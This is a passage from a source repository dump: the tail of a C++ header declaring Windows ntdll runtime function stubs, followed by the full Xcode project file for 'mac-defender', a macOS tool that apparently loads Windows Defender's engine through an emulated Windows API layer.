RtlImageNtHeader(void* ModuleAddress); 393 | static uint32_t __stdcall RtlImageNtHeaderEx(uint32_t Flags, void* base, uint64_t Size, PIMAGE_NT_HEADERS * OutHeaders); 394 | static bool __stdcall RtlAddFunctionTable(void* FunctionTable, uint32_t EntryCount, uint64_t BaseAddress); 395 | static bool __stdcall RtlDeleteFunctionTable(void* FunctionTable); 396 | static PRUNTIME_FUNCTION __stdcall RtlLookupFunctionEntry(uint64_t ControlPc, uint64_t* ImageBase, void* HistoryTable); 397 | static PRUNTIME_FUNCTION __stdcall RtlLookupFunctionTable(uint64_t ControlPc, uint64_t* ImageBase, uint32_t* Length); 398 | static WCHAR __stdcall RtlpUpcaseUnicodeChar(WCHAR Source); 399 | static bool __stdcall RtlPrefixUnicodeString(PUNICODE_STRING String1, PUNICODE_STRING String2, bool CaseInSensitive); 400 | static char16_t* __stdcall RtlIpv4AddressToStringW(in_addr *Addr, char16_t* S); 401 | static void* __stdcall RtlPcToFileHeader(void* PcValue, void** BaseOfImage); 402 | static void* __stdcall RtlImageDirectoryEntryToData(void* BaseAddress, bool MappedAsImage, uint16_t Directory, uint32_t* Size); 403 | static void __stdcall MockRtlCaptureContext(void* ContextRecord); 404 | static void __stdcall MockRtlRestoreContext(void* ContextRecord, PEXCEPTION_RECORD ExceptionRecord); 405 | static void __stdcall MockRtlUnwind(void* TargetFrame, PVOID TargetIp, PEXCEPTION_RECORD ExceptionRecord, PVOID ReturnValue); 406 | static bool __stdcall MockRtlUnwindEx(void* TargetFrame, void* TargetIp, void* ExceptionRecord, void* ReturnValue, void* ContextRecord, void* HistoryTable); 407 | static PEXCEPTION_ROUTINE __stdcall RtlVirtualUnwind( 408 | uint32_t HandlerType, 409 | uint64_t ImageBase, 410 | uint64_t ControlPc, 411 | PRUNTIME_FUNCTION FunctionEntry, 412 | PCONTEXT Context, 413 | void** HandlerData, 414 | uint64_t* EstablisherFrame, 415 | PKNONVOLATILE_CONTEXT_POINTERS ContextPointers 416 | ); 417 | static uint32_t __stdcall RtlNtStatusToDosError(NTSTATUS Status); 418 | #endif 419 | }; 420 | #endif 421 | -------------------------------------------------------------------------------- /mac-defender.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 50; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 2414B885277DF5C30074F04B /* loader.hpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B879277DDBA70074F04B /* loader.hpp */; }; 11 | 2414B886277DF5C30074F04B /* log.hpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B87C277DDBA70074F04B /* log.hpp */; }; 12 | 2414B887277DF5C30074F04B /* main.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B87B277DDBA70074F04B /* main.cpp */; }; 13 | 2414B88C277DF5C30074F04B /* wrapper.hpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B872277DDBA70074F04B /* wrapper.hpp */; }; 14 | 2414B899277DF6F80074F04B /* imports.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B895277DF6F80074F04B /* imports.cpp */; }; 15 | 2414B89A277DF6F80074F04B /* exports.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B896277DF6F80074F04B /* exports.cpp */; }; 16 | 2414B89B277DF6F80074F04B /* ntoskrnl.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B897277DF6F80074F04B /* ntoskrnl.cpp */; }; 17 | 2414B89C277DF6F80074F04B /* strutils.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B898277DF6F80074F04B /* strutils.cpp */; }; 18 | 2414B8A7277DF7120074F04B /* wintrust.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B89D277DF7120074F04B /* wintrust.cpp */; }; 19 | 2414B8A8277DF7120074F04B /* version.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B89E277DF7120074F04B /* version.cpp */; }; 20 | 2414B8A9277DF7120074F04B /* ntdll.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B89F277DF7120074F04B /* ntdll.cpp */; }; 21 | 2414B8AA277DF7120074F04B /* kernel32.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8A0277DF7120074F04B /* kernel32.cpp */; }; 22 | 2414B8AB277DF7120074F04B /* rpcrt4.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8A1277DF7120074F04B /* rpcrt4.cpp */; }; 23 | 2414B8AC277DF7120074F04B /* bcrypt.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8A2277DF7120074F04B /* bcrypt.cpp */; }; 24 | 2414B8AD277DF7120074F04B /* wofutil.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8A3277DF7120074F04B /* wofutil.cpp */; }; 25 | 2414B8AE277DF7120074F04B /* ole32.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8A4277DF7120074F04B /* ole32.cpp */; }; 26 | 2414B8AF277DF7120074F04B /* advapi32.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8A5277DF7120074F04B /* advapi32.cpp */; }; 27 | 2414B8B0277DF7120074F04B /* crypt32.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8A6277DF7120074F04B /* crypt32.cpp */; }; 28 | 2414B8B2277DF72B0074F04B /* jsoncpp.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8B1277DF72B0074F04B /* jsoncpp.cpp */; }; 29 | 2414B8B4277DF7410074F04B /* cb.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 2414B8B3277DF7410074F04B /* cb.cpp */; }; 30 | 246143D32785F81600AA3151 /* dxgi.cpp in Sources */ = {isa = PBXBuildFile; fileRef = 246143D22785F81600AA3151 /* dxgi.cpp */; }; 31 | /* End PBXBuildFile section */ 32 | 33 | /* Begin PBXCopyFilesBuildPhase section */ 34 | 2414B860277DD97B0074F04B /* CopyFiles */ = { 35 | isa = PBXCopyFilesBuildPhase; 36 | buildActionMask = 2147483647; 37 | dstPath = /usr/share/man/man1/; 38 | dstSubfolderSpec = 0; 39 | files = ( 40 | ); 41 | runOnlyForDeploymentPostprocessing = 1; 42 | }; 43 | /* End PBXCopyFilesBuildPhase section */ 44 | 45 | /* Begin PBXFileReference section */ 46 | 2414B862277DD97B0074F04B /* mac-defender */ = {isa = PBXFileReference; explicitFileType = "compiled.mach-o.executable"; includeInIndex = 0; path = "mac-defender"; sourceTree = BUILT_PRODUCTS_DIR; }; 47 | 2414B86F277DDBA70074F04B /* mpcore */ = {isa = PBXFileReference; lastKnownFileType = folder; path = mpcore; sourceTree = ""; }; 48 | 2414B870277DDBA70074F04B /* include */ = {isa = PBXFileReference; lastKnownFileType = folder; path = include; sourceTree = ""; }; 49 | 2414B871277DDBA70074F04B /* of-loadlib.sln */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text; path = "of-loadlib.sln"; sourceTree = ""; }; 50 | 2414B872277DDBA70074F04B /* wrapper.hpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.h; path = wrapper.hpp; sourceTree = ""; }; 51 | 2414B873277DDBA70074F04B /* sample */ = {isa = PBXFileReference; lastKnownFileType = folder; path = sample; sourceTree = ""; }; 52 | 2414B874277DDBA70074F04B /* of-loadlib.vcxproj.filters */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.xml; path = "of-loadlib.vcxproj.filters"; sourceTree = ""; }; 53 | 2414B875277DDBA70074F04B /* LICENSE.md */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = net.daringfireball.markdown; path = LICENSE.md; sourceTree = ""; }; 54 | 2414B876277DDBA70074F04B /* engine */ = {isa = PBXFileReference; lastKnownFileType = folder; path = engine; sourceTree = ""; }; 55 | 2414B877277DDBA70074F04B /* reg */ = {isa = PBXFileReference; lastKnownFileType = folder; path = reg; sourceTree = ""; }; 56 | 2414B878277DDBA70074F04B /* README.md */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = net.daringfireball.markdown; path = README.md; sourceTree = ""; }; 57 | 2414B879277DDBA70074F04B /* loader.hpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.h; path = loader.hpp; sourceTree = ""; }; 58 | 2414B87A277DDBA70074F04B /* winapi */ = {isa = PBXFileReference; lastKnownFileType = folder; path = winapi; sourceTree = ""; }; 59 | 2414B87B277DDBA70074F04B /* main.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = main.cpp; sourceTree = ""; }; 60 | 2414B87C277DDBA70074F04B /* log.hpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.h; path = log.hpp; sourceTree = ""; }; 61 | 2414B87D277DDBA70074F04B /* of-loadlib.vcxproj */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.xml; path = "of-loadlib.vcxproj"; sourceTree = ""; }; 62 | 2414B87E277DDBA70074F04B /* cb */ = {isa = PBXFileReference; lastKnownFileType = folder; path = cb; sourceTree = ""; }; 63 | 2414B895277DF6F80074F04B /* imports.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = imports.cpp; path = winapi/imports.cpp; sourceTree = ""; }; 64 | 2414B896277DF6F80074F04B /* exports.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = exports.cpp; path = winapi/exports.cpp; sourceTree = ""; }; 65 | 2414B897277DF6F80074F04B /* ntoskrnl.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = ntoskrnl.cpp; path = winapi/ntoskrnl.cpp; sourceTree = ""; }; 66 | 2414B898277DF6F80074F04B /* strutils.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = strutils.cpp; path = winapi/strutils.cpp; sourceTree = ""; }; 67 | 2414B89D277DF7120074F04B /* wintrust.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = wintrust.cpp; path = winapi/dlls/wintrust.cpp; sourceTree = ""; }; 68 | 2414B89E277DF7120074F04B /* version.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = version.cpp; path = winapi/dlls/version.cpp; sourceTree = ""; }; 69 | 2414B89F277DF7120074F04B /* ntdll.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = ntdll.cpp; path = winapi/dlls/ntdll.cpp; sourceTree = ""; }; 70 | 2414B8A0277DF7120074F04B /* kernel32.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = kernel32.cpp; path = winapi/dlls/kernel32.cpp; sourceTree = ""; }; 71 | 2414B8A1277DF7120074F04B /* rpcrt4.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = rpcrt4.cpp; path = winapi/dlls/rpcrt4.cpp; sourceTree = ""; }; 72 | 2414B8A2277DF7120074F04B /* bcrypt.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = bcrypt.cpp; path = winapi/dlls/bcrypt.cpp; sourceTree = ""; }; 73 | 2414B8A3277DF7120074F04B /* wofutil.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = wofutil.cpp; path = winapi/dlls/wofutil.cpp; sourceTree = ""; }; 74 | 2414B8A4277DF7120074F04B /* ole32.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = ole32.cpp; path = winapi/dlls/ole32.cpp; sourceTree = ""; }; 75 | 2414B8A5277DF7120074F04B /* advapi32.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = advapi32.cpp; path = winapi/dlls/advapi32.cpp; sourceTree = ""; }; 76 | 2414B8A6277DF7120074F04B /* crypt32.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = crypt32.cpp; path = winapi/dlls/crypt32.cpp; sourceTree = ""; }; 77 | 2414B8B1277DF72B0074F04B /* jsoncpp.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = jsoncpp.cpp; path = include/jsoncpp/jsoncpp.cpp; sourceTree = ""; }; 78 | 2414B8B3277DF7410074F04B /* cb.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = cb.cpp; path = cb/cb.cpp; sourceTree = ""; }; 79 | 246143D22785F81600AA3151 /* dxgi.cpp */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.cpp.cpp; name = dxgi.cpp; path = winapi/dlls/dxgi.cpp; sourceTree = ""; }; 80 | /* End PBXFileReference section */ 81 | 82 | /* Begin PBXFrameworksBuildPhase section */ 83 | 2414B85F277DD97B0074F04B /* Frameworks */ = { 84 | isa = PBXFrameworksBuildPhase; 85 | buildActionMask = 2147483647; 86 | files = ( 87 | ); 88 | runOnlyForDeploymentPostprocessing = 0; 89 | }; 90 | /* End PBXFrameworksBuildPhase section */ 91 | 92 | /* Begin PBXGroup section */ 93 | 2414B859277DD97B0074F04B = { 94 | isa = PBXGroup; 95 | children = ( 96 | 246143D22785F81600AA3151 /* dxgi.cpp */, 97 | 2414B8B3277DF7410074F04B /* cb.cpp */, 98 | 2414B8B1277DF72B0074F04B /* jsoncpp.cpp */, 99 | 2414B8A5277DF7120074F04B /* advapi32.cpp */, 100 | 2414B8A2277DF7120074F04B /* bcrypt.cpp */, 101 | 2414B8A6277DF7120074F04B /* crypt32.cpp */, 102 | 2414B8A0277DF7120074F04B /* kernel32.cpp */, 103 | 2414B89F277DF7120074F04B /* ntdll.cpp */, 104 | 2414B8A4277DF7120074F04B /* ole32.cpp */, 105 | 2414B8A1277DF7120074F04B /* rpcrt4.cpp */, 106 | 2414B89E277DF7120074F04B /* version.cpp */, 107 | 2414B89D277DF7120074F04B /* wintrust.cpp */, 108 | 2414B8A3277DF7120074F04B /* wofutil.cpp */, 109 | 2414B896277DF6F80074F04B /* exports.cpp */, 110 | 2414B895277DF6F80074F04B /* imports.cpp */, 111 | 2414B897277DF6F80074F04B /* ntoskrnl.cpp */, 112 | 2414B898277DF6F80074F04B /* strutils.cpp */, 113 | 2414B87E277DDBA70074F04B /* cb */, 114 | 2414B876277DDBA70074F04B /* engine */, 115 | 2414B870277DDBA70074F04B /* include */, 116 | 2414B875277DDBA70074F04B /* LICENSE.md */, 117 | 2414B879277DDBA70074F04B /* loader.hpp */, 118 | 2414B87C277DDBA70074F04B /* log.hpp */, 119 | 2414B87B277DDBA70074F04B /* main.cpp */, 120 | 2414B86F277DDBA70074F04B /* mpcore */, 121 | 2414B871277DDBA70074F04B /* of-loadlib.sln */, 122 | 2414B87D277DDBA70074F04B /* of-loadlib.vcxproj */, 123 | 2414B874277DDBA70074F04B /* of-loadlib.vcxproj.filters */, 124 | 2414B878277DDBA70074F04B /* README.md */, 125 | 2414B877277DDBA70074F04B /* reg */, 126 | 2414B873277DDBA70074F04B /* sample */, 127 | 2414B87A277DDBA70074F04B /* winapi */, 128 | 2414B872277DDBA70074F04B /* wrapper.hpp */, 129 | 2414B863277DD97B0074F04B /* Products */, 130 | ); 131 | sourceTree = ""; 132 | }; 133 | 2414B863277DD97B0074F04B /* Products */ = { 134 | isa = PBXGroup; 135 | children = ( 136 | 2414B862277DD97B0074F04B /* mac-defender */, 137 | ); 138 | name = Products; 139 | sourceTree = ""; 140 | }; 141 | /* End PBXGroup section */ 142 | 143 | /* Begin PBXNativeTarget section */ 144 | 2414B861277DD97B0074F04B /* mac-defender */ = { 145 | isa = PBXNativeTarget; 146 | buildConfigurationList = 2414B869277DD97B0074F04B /* Build configuration list for PBXNativeTarget "mac-defender" */; 147 | buildPhases = ( 148 | 2414B85E277DD97B0074F04B /* Sources */, 149 | 2414B85F277DD97B0074F04B /* Frameworks */, 150 | 2414B860277DD97B0074F04B /* CopyFiles */, 151 | ); 152 | buildRules = ( 153 | ); 154 | dependencies = ( 155 | ); 156 | name = "mac-defender"; 157 | productName = "mac-defender"; 158 | productReference = 2414B862277DD97B0074F04B /* mac-defender */; 159 | productType = "com.apple.product-type.tool"; 160 | }; 161 | /* End PBXNativeTarget section */ 162 | 163 | /* Begin PBXProject section */ 164 | 2414B85A277DD97B0074F04B /* Project object */ = { 165 | isa = PBXProject; 166 | attributes = { 167 | LastUpgradeCheck = 1160; 168 | ORGANIZATIONNAME = "para bellum"; 169 | TargetAttributes = { 170 | 2414B861277DD97B0074F04B = { 171 | CreatedOnToolsVersion = 11.6; 172 | }; 173 | }; 174 | }; 175 | buildConfigurationList = 2414B85D277DD97B0074F04B /* Build configuration list for PBXProject "mac-defender" */; 176 | compatibilityVersion = "Xcode 9.3"; 177 | developmentRegion = en; 178 | hasScannedForEncodings = 0; 179 | knownRegions = ( 180 | en, 181 | Base, 182 | ); 183 | mainGroup = 2414B859277DD97B0074F04B; 184 | productRefGroup = 2414B863277DD97B0074F04B /* Products */; 185 | projectDirPath = ""; 186 | projectRoot = ""; 187 | targets = ( 188 | 2414B861277DD97B0074F04B /* mac-defender */, 189 | ); 190 | }; 191 | /* End PBXProject section */ 192 | 193 | /* Begin PBXSourcesBuildPhase section */ 194 | 2414B85E277DD97B0074F04B /* Sources */ = { 195 | isa = PBXSourcesBuildPhase; 196 | buildActionMask = 2147483647; 197 | files = ( 198 | 246143D32785F81600AA3151 /* dxgi.cpp in Sources */, 199 | 2414B8B4277DF7410074F04B /* cb.cpp in Sources */, 200 | 2414B8B2277DF72B0074F04B /* jsoncpp.cpp in Sources */, 201 | 2414B8A7277DF7120074F04B /* wintrust.cpp in Sources */, 202 | 2414B8A8277DF7120074F04B /* version.cpp in Sources */, 203 | 2414B8A9277DF7120074F04B /* ntdll.cpp in Sources */, 204 | 2414B8AA277DF7120074F04B /* kernel32.cpp in Sources */, 205 | 2414B8AB277DF7120074F04B /* rpcrt4.cpp in Sources */, 206 | 2414B8AC277DF7120074F04B /* bcrypt.cpp in Sources */, 207 | 2414B8AD277DF7120074F04B /* wofutil.cpp in Sources */, 208 | 2414B8AE277DF7120074F04B /* ole32.cpp in Sources */, 209 | 2414B8AF277DF7120074F04B /* advapi32.cpp in Sources */, 210 | 2414B8B0277DF7120074F04B /* crypt32.cpp in Sources */, 211 | 2414B899277DF6F80074F04B /* imports.cpp in Sources */, 212 | 2414B89A277DF6F80074F04B /* exports.cpp in Sources */, 213 | 2414B89B277DF6F80074F04B /* ntoskrnl.cpp in Sources */, 214 | 2414B89C277DF6F80074F04B /* strutils.cpp in Sources */, 215 | 2414B885277DF5C30074F04B /* loader.hpp in Sources */, 216 | 2414B886277DF5C30074F04B /* log.hpp in Sources */, 217 | 2414B887277DF5C30074F04B /* main.cpp in Sources */, 218 | 2414B88C277DF5C30074F04B /* wrapper.hpp in Sources */, 219 | ); 220 | runOnlyForDeploymentPostprocessing = 0; 221 | }; 222 | /* End PBXSourcesBuildPhase section */ 223 | 224 | /* Begin XCBuildConfiguration section */ 225 | 2414B867277DD97B0074F04B /* Debug */ = { 226 | isa = XCBuildConfiguration; 227 | buildSettings = { 228 | ALWAYS_SEARCH_USER_PATHS = NO; 229 | CLANG_ANALYZER_NONNULL = YES; 230 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 231 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 232 | CLANG_CXX_LIBRARY = "libc++"; 233 | CLANG_ENABLE_MODULES = YES; 234 | CLANG_ENABLE_OBJC_ARC = YES; 235 | CLANG_ENABLE_OBJC_WEAK = YES; 236 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 237 | CLANG_WARN_BOOL_CONVERSION = YES; 238 | CLANG_WARN_COMMA = YES; 239 | CLANG_WARN_CONSTANT_CONVERSION = YES; 240 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 241 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 242 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 243 | CLANG_WARN_EMPTY_BODY = YES; 244 | CLANG_WARN_ENUM_CONVERSION = YES; 245 | CLANG_WARN_INFINITE_RECURSION = YES; 246 | CLANG_WARN_INT_CONVERSION = YES; 247 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 248 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 249 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 250 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 251 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 252 | CLANG_WARN_STRICT_PROTOTYPES = YES; 253 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 254 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 255 | CLANG_WARN_UNREACHABLE_CODE = YES; 256 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 257 | COPY_PHASE_STRIP = NO; 258 | DEBUG_INFORMATION_FORMAT = dwarf; 259 | ENABLE_STRICT_OBJC_MSGSEND = YES; 260 | ENABLE_TESTABILITY = YES; 261 | GCC_C_LANGUAGE_STANDARD = gnu11; 262 | GCC_DYNAMIC_NO_PIC = NO; 263 | GCC_NO_COMMON_BLOCKS = YES; 264 | GCC_OPTIMIZATION_LEVEL = 0; 265 | GCC_PREPROCESSOR_DEFINITIONS = ( 266 | "DEBUG=1", 267 | "$(inherited)", 268 | ); 269 | "GCC_PREPROCESSOR_DEFINITIONS[arch=*]" = ( 270 | "DEBUG=1", 271 | "$(inherited)", 272 | __APPLE__, 273 | _X64, 274 | _XOPEN_SOURCE, 275 | ); 276 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 277 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 278 | GCC_WARN_UNDECLARED_SELECTOR = YES; 279 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 280 | GCC_WARN_UNUSED_FUNCTION = YES; 281 | GCC_WARN_UNUSED_VARIABLE = YES; 282 | MACOSX_DEPLOYMENT_TARGET = 10.15; 283 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 284 | MTL_FAST_MATH = YES; 285 | ONLY_ACTIVE_ARCH = YES; 286 | SDKROOT = macosx; 287 | }; 288 | name = Debug; 289 | }; 290 | 2414B868277DD97B0074F04B /* Release */ = { 291 | isa = XCBuildConfiguration; 292 | buildSettings = { 293 | ALWAYS_SEARCH_USER_PATHS = NO; 294 | CLANG_ANALYZER_NONNULL = YES; 295 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 296 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 297 | CLANG_CXX_LIBRARY = "libc++"; 298 | CLANG_ENABLE_MODULES = YES; 299 | CLANG_ENABLE_OBJC_ARC = YES; 300 | CLANG_ENABLE_OBJC_WEAK = YES; 301 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 302 | CLANG_WARN_BOOL_CONVERSION = YES; 303 | CLANG_WARN_COMMA = YES; 304 | CLANG_WARN_CONSTANT_CONVERSION = YES; 305 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 306 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 307 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 308 | CLANG_WARN_EMPTY_BODY = YES; 309 | CLANG_WARN_ENUM_CONVERSION = YES; 310 | CLANG_WARN_INFINITE_RECURSION = YES; 311 | CLANG_WARN_INT_CONVERSION = YES; 312 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 313 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 314 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 315 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 316 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 317 | CLANG_WARN_STRICT_PROTOTYPES = YES; 318 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 319 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 320 | CLANG_WARN_UNREACHABLE_CODE = YES; 321 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 322 | COPY_PHASE_STRIP = NO; 323 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 324 | ENABLE_NS_ASSERTIONS = NO; 325 | ENABLE_STRICT_OBJC_MSGSEND = YES; 326 | GCC_C_LANGUAGE_STANDARD = gnu11; 327 | GCC_NO_COMMON_BLOCKS = YES; 328 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 329 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 330 | GCC_WARN_UNDECLARED_SELECTOR = YES; 331 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 332 | GCC_WARN_UNUSED_FUNCTION = YES; 333 | GCC_WARN_UNUSED_VARIABLE = YES; 334 | MACOSX_DEPLOYMENT_TARGET = 10.15; 335 | MTL_ENABLE_DEBUG_INFO = NO; 336 | MTL_FAST_MATH = YES; 337 | SDKROOT = macosx; 338 | }; 339 | name = Release; 340 | }; 341 | 2414B86A277DD97B0074F04B /* Debug */ = { 342 | isa = XCBuildConfiguration; 343 | buildSettings = { 344 | CODE_SIGN_STYLE = Automatic; 345 | "GCC_PREPROCESSOR_DEFINITIONS[arch=*]" = ( 346 | "DEBUG=1", 347 | "$(inherited)", 348 | __APPLE__, 349 | _X64, 350 | _DEBUG_, 351 | _XOPEN_SOURCE, 352 | ); 353 | PRODUCT_NAME = "$(TARGET_NAME)"; 354 | }; 355 | name = Debug; 356 | }; 357 | 2414B86B277DD97B0074F04B /* Release */ = { 358 | isa = XCBuildConfiguration; 359 | buildSettings = { 360 | CODE_SIGN_STYLE = Automatic; 361 | PRODUCT_NAME = "$(TARGET_NAME)"; 362 | }; 363 | name = Release; 364 | }; 365 | /* End XCBuildConfiguration section */ 366 | 367 | /* Begin XCConfigurationList section */ 368 | 2414B85D277DD97B0074F04B /* Build configuration list for PBXProject "mac-defender" */ = { 369 | isa = XCConfigurationList; 370 | buildConfigurations = ( 371 | 2414B867277DD97B0074F04B /* Debug */, 372 | 2414B868277DD97B0074F04B /* Release */, 373 | ); 374 | defaultConfigurationIsVisible = 0; 375 | defaultConfigurationName = Release; 376 | }; 377 | 2414B869277DD97B0074F04B /* Build configuration list for PBXNativeTarget "mac-defender" */ = { 378 | isa = XCConfigurationList; 379 | buildConfigurations = ( 380 | 2414B86A277DD97B0074F04B /* Debug */, 381 | 2414B86B277DD97B0074F04B /* Release */, 382 | ); 383 | defaultConfigurationIsVisible = 0; 384 | defaultConfigurationName = Release; 385 | }; 386 | /* End XCConfigurationList section */ 387 | }; 388 | rootObject = 2414B85A277DD97B0074F04B /* Project object */; 389 | } 390 | --------------------------------------------------------------------------------